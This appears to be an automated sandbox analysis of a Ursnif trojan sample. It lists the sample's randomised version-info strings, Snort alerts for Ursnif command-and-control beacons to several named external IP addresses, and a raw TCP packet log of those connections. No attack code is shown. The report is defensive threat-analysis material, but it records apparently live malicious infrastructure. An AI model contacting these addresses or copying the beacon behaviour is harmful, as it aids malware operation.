                  LaparocolectomyTataric
                  PeriplegmaticZein
                  ArchigonyMowrah
                  ProstatorrhoeaAsynergy
                  PaedotrophicAmbagious
                  OcclusometerBeray
                  FileVersion8, 8, 9, 0
                  BackwoodsmanMyrmecophobic
                  TransfusionistSynchondrotomy
                  ThiggingClassable
                  ReappraisementShickered
                  WrinklefulRetrohepatic
                  TelelectricPreinterpretative
                  SerfageSphaerioidaceae
                  InfitterUnofficerlike
                  ArticulatelyKinetogenetic
                  FastigiateOleocalcareous
                  InfectantPremedia
                  OctosporousCorol
                  CounteracquittanceSarsa
                  SpiracleTath
                  CorradiateUnelevated
                  FileDescriptionParatitles
                  UnoratoricalSolicited
                  ThronelessMazy
                  RobleUploom
                  CosmogonalTyphoonish
                  MethanometerAnalyzation
                  BullnoseSupermoisten
                  NonconformistUnbeaded
                  OctagonallyBrushwood
                  AtavicChanterelle
                  PyoperitonitisWitlessness
                  PresealBensel
                  PalaeonemertineaUnoared
                  EmpanelmentAularian
                  SolidungulaTaplash
                  CardiolysisCounteragency
                  DimoricAstony
                  CarpoptosisReinterest
                  HelodesSemibolshevist
                  RecompilationSupernecessity
                  ImproviserAmphiblastula
                  RedemptressAntennula
                  RewoodPrehandle
                  FloormanConservativeness
                  WaiterPrinceage
                  DacrycystalgiaBerylloid
                  OppositiousOverstrain
                  AffiancerMusaceous
                  UngivenAutobiographal
                  AlupagAmbisporangiate
                  MadreperlUnclericalize
                  IntervisitHypomnematic
                  SilverlyResale
                  ChrysophiliteYarke
                  NyctalopyMandative
                  LycaenaUnexplainedly
                  ManufacturessOrgiasm
                  DotriacontaneAttractionally
                  ReseatSoneri
                  UnprecedentednessCherishing
                  MeconologyCynocrambaceous
                  UnhuzzaedEuchological
                  PulkaKeitloa
                  TransisthmianNotaeal
                  SwiveleyedStubbleward
                  InterportalTrimellitic
                  SolicitedSacker
                  ScythemanCoracocostal
                  PreinstructFilelike
                  SleekitCongroid
                  EpigaeaTriolet
                  TettigoniidHova
                  GeltSperable
                  PneumatochemicalThamyras
                  ArmigerousPenholder
                  DecrierTetramastia
                  CommodatumIlokano
                  PitiabilityCountersale
                  TripeshopSuccedanea
                  RetraverseEffulgence
                  HysterioidRecoilingly
                  ChurchishUnstigmatized
                  CardiodysneuriaDecrier
                  KittendomBilirubinic
                  PluvianNecessar
                  AftermarkLevelheadedness
                  SupinenessIntervital
                  PutredinousSemantical
                  ImmovablyKlops
                  StormproofMosquitobill
                  UnbefittingnessSchlenter
                  SpelkRevisee
                  MacroplastiaFluctuant
                  VotableUncleverly
                  QuiverfulTransequatorial
                  IncoheringMercurification
                  SuperindustryCocreditor
                  MutsuddyOversecure
                  EleusineGallegan
                  YestUnbarred
                  ArchershipSplashingly
                  KaolinizeTequistlatecan
                  CassenaEctodermoidal
                  CompanyNameGuanaco
                  SartorialPalpebration
                  AntevertDashy
                  OverexpectFlippery
                  UnevincedSabiaceae
                  CimicidNaughtily
                  OssiculotomyOvertype
                  LyremanPhlegmatical
                  TathBurut
                  SuboptimalTunnelite
                  CaffaWieldable
                  BracingStekan
                  OversleeveUltraliberalism
                  StracklingBelittler
                  AnamnionicTypothetae
                  UnhobblePickmaw
                  OverloathMaxillopremaxillary
                  AntisepticistOversleeve
                  ShamefacednessFlourishy
                  FlatulenceStraitlacing
                  TchickPanoistic
                  MacleayaProsateur
                  TetrachordonTelemetrical
                  InfortunatenessProgrediency
                  HerbagerChemokinetic
                  ChasmedRansel
                  TrilithicMelos
                  FlooderCharacinid
                  MonopterousDrifting
                  MicrocythemiaDisemburden
                  SpracklyChristocentric
                  TrioletFiremanship
                  SplinterlessHassocky
                  CultirostralBasiparaplastin
                  CiboryMosaicism
                  MotePhonographic
                  AnchithereUndiscording
                  GuileryQuaintly
                  ConcurrenceNotopodial
                  StaurologyDraperied
                  NotaealFluate
                  DioptricRopeman
                  ScrublandEpidotization
                  SurculousFiscalize
                  AxmanshipNonconformist
                  Translation0x0409 0x04e4

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  01/21/22-07:52:33.154789TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975580192.168.2.331.41.46.120
                  01/21/22-07:52:33.156999TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.331.41.46.120
                  01/21/22-07:52:33.200899TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975680192.168.2.331.41.46.120
                  01/21/22-07:52:33.224863TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.331.41.46.120
                  01/21/22-07:52:33.373173TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.331.41.46.120
                  01/21/22-07:53:19.287818TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979880192.168.2.3192.64.119.233
                  01/21/22-07:53:19.287818TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979880192.168.2.3192.64.119.233
                  01/21/22-07:53:20.714209TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4980180192.168.2.3192.64.119.233
                  01/21/22-07:53:20.714209TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4980180192.168.2.3192.64.119.233
                  01/21/22-07:53:20.722322TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4980280192.168.2.3192.64.119.233
                  01/21/22-07:53:21.753692TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4980480192.168.2.3192.64.119.233
                  01/21/22-07:53:22.248539TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4981280192.168.2.3198.54.117.218
                  01/21/22-07:53:22.248539TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981280192.168.2.3198.54.117.218
                  01/21/22-07:53:22.270560TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981480192.168.2.3198.54.117.211
                  01/21/22-07:53:22.431092TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981380192.168.2.3198.54.117.211
                  01/21/22-07:53:22.757134TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981580192.168.2.3198.54.117.211
                  01/21/22-07:53:24.126191TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981980192.168.2.3198.54.117.210
                  01/21/22-07:53:24.130305TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4981780192.168.2.3198.54.117.210
                  01/21/22-07:53:24.130305TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981780192.168.2.3198.54.117.210
                  01/21/22-07:53:51.879244TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4984780192.168.2.331.41.46.120
                  01/21/22-07:53:51.879244TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984780192.168.2.331.41.46.120
                  01/21/22-07:53:53.115874TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984880192.168.2.331.41.46.120
                  01/21/22-07:53:53.129217TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985080192.168.2.331.41.46.120
                  01/21/22-07:53:53.129217TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985080192.168.2.331.41.46.120
                  01/21/22-07:53:53.176908TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4984980192.168.2.331.41.46.120
                  01/21/22-07:53:53.189969TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985180192.168.2.331.41.46.120
                  01/21/22-07:53:53.189969TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985180192.168.2.331.41.46.120
                  01/21/22-07:53:53.311358TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985480192.168.2.331.41.46.120
                  01/21/22-07:53:53.318908TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985680192.168.2.331.41.46.120
                  01/21/22-07:53:53.318908TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985680192.168.2.331.41.46.120
                  01/21/22-07:53:53.377353TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985580192.168.2.331.41.46.120
                  01/21/22-07:53:53.385300TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985780192.168.2.331.41.46.120
                  01/21/22-07:53:53.385300TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985780192.168.2.331.41.46.120
                  01/21/22-07:53:53.512000TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986180192.168.2.331.41.46.120
                  01/21/22-07:53:53.512000TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986180192.168.2.331.41.46.120
                  01/21/22-07:53:53.509435TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985880192.168.2.331.41.46.120
                  01/21/22-07:53:53.576872TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985980192.168.2.331.41.46.120
                  01/21/22-07:53:53.706053TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986280192.168.2.331.41.46.120
                  01/21/22-07:54:16.363537TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986480192.168.2.3162.255.119.177
                  01/21/22-07:54:16.363537TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986480192.168.2.3162.255.119.177
                  01/21/22-07:54:20.027969TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986680192.168.2.3198.54.117.216
                  01/21/22-07:54:20.027969TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986680192.168.2.3198.54.117.216
                  01/21/22-07:54:20.208185TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986780192.168.2.3198.54.117.216
                  01/21/22-07:54:20.208185TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986780192.168.2.3198.54.117.216
                  01/21/22-07:54:20.530349TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986880192.168.2.3198.54.117.216
                  01/21/22-07:54:20.530349TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986880192.168.2.3198.54.117.216
                  01/21/22-07:54:20.702386TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986980192.168.2.3198.54.117.216
                  01/21/22-07:54:20.702386TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986980192.168.2.3198.54.117.216
                  01/21/22-07:54:21.035411TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4987080192.168.2.3198.54.117.216
                  01/21/22-07:54:21.035411TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4987080192.168.2.3198.54.117.216
                  01/21/22-07:54:21.206570TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4987180192.168.2.3198.54.117.216
                  01/21/22-07:54:21.206570TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4987180192.168.2.3198.54.117.216
                  01/21/22-07:54:21.547805TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4987280192.168.2.3198.54.117.216
                  01/21/22-07:54:21.547805TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4987280192.168.2.3198.54.117.216
                  01/21/22-07:54:21.590420TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4987980192.168.2.3162.255.119.177
                  01/21/22-07:54:21.590420TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4987980192.168.2.3162.255.119.177
                  01/21/22-07:54:24.476659TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988080192.168.2.3198.54.117.211
                  01/21/22-07:54:24.476659TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988080192.168.2.3198.54.117.211
                  01/21/22-07:54:44.176512TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988280192.168.2.3192.64.119.233
                  01/21/22-07:54:44.176512TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988280192.168.2.3192.64.119.233
                  01/21/22-07:54:47.258850TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988380192.168.2.3198.54.117.212
                  01/21/22-07:54:47.258850TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988380192.168.2.3198.54.117.212
                  01/21/22-07:54:47.639855TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988480192.168.2.3192.64.119.233
                  01/21/22-07:54:47.639855TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988480192.168.2.3192.64.119.233
                  01/21/22-07:54:50.027799TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988580192.168.2.3198.54.117.215
                  01/21/22-07:54:50.027799TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988580192.168.2.3198.54.117.215
                  01/21/22-07:55:07.581452TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988680192.168.2.331.41.46.120
                  01/21/22-07:55:07.581452TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988680192.168.2.331.41.46.120
                  01/21/22-07:55:10.371343TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988780192.168.2.331.41.46.120
                  01/21/22-07:55:10.371343TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988780192.168.2.331.41.46.120
                  01/21/22-07:55:18.981075TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988880192.168.2.3192.64.119.233
                  01/21/22-07:55:19.304621TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988980192.168.2.3192.64.119.233
                  01/21/22-07:55:19.340750TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4989080192.168.2.3198.54.117.210
                  01/21/22-07:55:19.661740TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4989180192.168.2.3198.54.117.216
                  01/21/22-07:55:39.651832TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4989480192.168.2.331.41.46.120
                  01/21/22-07:55:39.651832TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4989480192.168.2.331.41.46.120
                  01/21/22-07:55:40.062399TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4989580192.168.2.331.41.46.120
                  01/21/22-07:55:40.062399TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4989580192.168.2.331.41.46.120

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 21, 2022 07:52:31.567497969 CET4974480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.567838907 CET4974580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.627804995 CET804974431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.627966881 CET4974480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.631757975 CET804974531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.631772995 CET4974480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.631887913 CET4974580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.691812038 CET804974431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.692135096 CET804974431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.692205906 CET4974480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.706974983 CET4974480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.707668066 CET4974580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.767529011 CET804974431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.771528006 CET804974531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.771574020 CET804974531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.771672010 CET4974580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.775500059 CET4974580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.776485920 CET4974680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.777260065 CET4974780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.836086035 CET804974631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.836220980 CET4974680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.839242935 CET804974531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.840388060 CET804974731.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.840504885 CET4974780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.905735016 CET4974680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.967286110 CET804974631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.967427015 CET804974631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:31.967530966 CET4974680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.967710972 CET4974680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:31.968349934 CET4974780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.027362108 CET804974631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.032087088 CET804974731.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.032128096 CET804974731.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.032268047 CET4974780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.038938999 CET4974780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.040370941 CET4974880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.043366909 CET4974980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.100688934 CET804974831.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.100809097 CET4974880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.101609945 CET4974880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.101807117 CET804974731.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.107114077 CET804974931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.108035088 CET4974980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.161695004 CET804974831.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.161736012 CET804974831.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.161824942 CET4974880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.162203074 CET4974880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.171870947 CET4974980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.222075939 CET804974831.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.235716105 CET804974931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.235814095 CET804974931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.235977888 CET4974980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.236067057 CET4974980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.237864017 CET4975080192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.238197088 CET4975180192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.298777103 CET804975031.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.298830986 CET804975131.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.298924923 CET4975080192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.299029112 CET4975180192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.299140930 CET804974931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.300170898 CET4975080192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.360723019 CET804975031.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.360757113 CET804975031.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:32.360863924 CET4975080192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.361042976 CET4975080192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:32.421195984 CET804975031.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.092344046 CET4975280192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.092891932 CET4975380192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.093578100 CET4975480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.093943119 CET4975580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.136466026 CET4975680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.137164116 CET4975780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.153539896 CET804975531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.153671026 CET4975580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.154788971 CET4975580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.155654907 CET804975231.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.155750036 CET4975280192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.156444073 CET804975331.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.156532049 CET4975380192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.156763077 CET804975431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.156846046 CET4975480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.156999111 CET4975280192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.200208902 CET804975731.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.200242996 CET804975631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.200398922 CET4975780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.200453997 CET4975680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.200898886 CET4975680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.215770960 CET804975531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.215807915 CET804975531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.215879917 CET4975580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.216089010 CET4975580192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.220377922 CET804975231.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.220407009 CET804975231.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.220477104 CET4975280192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.224194050 CET4975280192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.224863052 CET4975480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.266338110 CET804975631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.266410112 CET804975631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.266556025 CET4975680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.269349098 CET4975680192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.277188063 CET804975531.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.287565947 CET804975231.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.288096905 CET804975431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.288207054 CET804975431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.288289070 CET4975480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.291472912 CET4975480192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.309175014 CET4975980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.309628010 CET4975880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.332489967 CET804975631.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.355861902 CET804975431.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.372390985 CET804975931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.372654915 CET804975831.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.372713089 CET4975980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.372809887 CET4975880192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.373172998 CET4975980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.437633991 CET804975931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.437671900 CET804975931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:33.437762976 CET4975980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.438364983 CET4975980192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:33.501166105 CET804975931.41.46.120192.168.2.3
                  Jan 21, 2022 07:52:39.206899881 CET4975180192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:40.149022102 CET4975380192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:40.833432913 CET4975780192.168.2.331.41.46.120
                  Jan 21, 2022 07:52:40.986733913 CET4975880192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:18.065752983 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:18.066226006 CET4979980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.075223923 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.075305939 CET4979980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.235165119 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:19.235207081 CET8049799192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:19.235316992 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.235368967 CET4979980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.287817955 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:19.447900057 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:20.552751064 CET4980080192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.552874088 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.561306953 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.561703920 CET4980380192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.588567972 CET4980580192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.588594913 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.713092089 CET8049801192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:20.713301897 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.714209080 CET4980180192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.721519947 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:20.721643925 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.722321987 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:20.874222040 CET8049801192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:20.882280111 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:21.559784889 CET4980080192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.575449944 CET4980380192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.591044903 CET4980580192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.591584921 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.735563993 CET8049803192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:21.735728025 CET4980380192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.751439095 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:21.752873898 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.753691912 CET4980480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:21.913510084 CET8049804192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.050024986 CET8049798192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.050117016 CET4979880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:22.071861982 CET8049802192.64.119.233192.168.2.3
                  Jan 21, 2022 07:53:22.071943045 CET4980280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:53:22.084553003 CET4981180192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.084604025 CET4981280192.168.2.3198.54.117.218
                  Jan 21, 2022 07:53:22.109364033 CET4981380192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.109472990 CET4981480192.168.2.3198.54.117.211
                  Jan 21, 2022 07:53:22.247699976 CET8049811198.54.117.218192.168.2.3
                  Jan 21, 2022 07:53:22.247736931 CET8049812198.54.117.218192.168.2.3
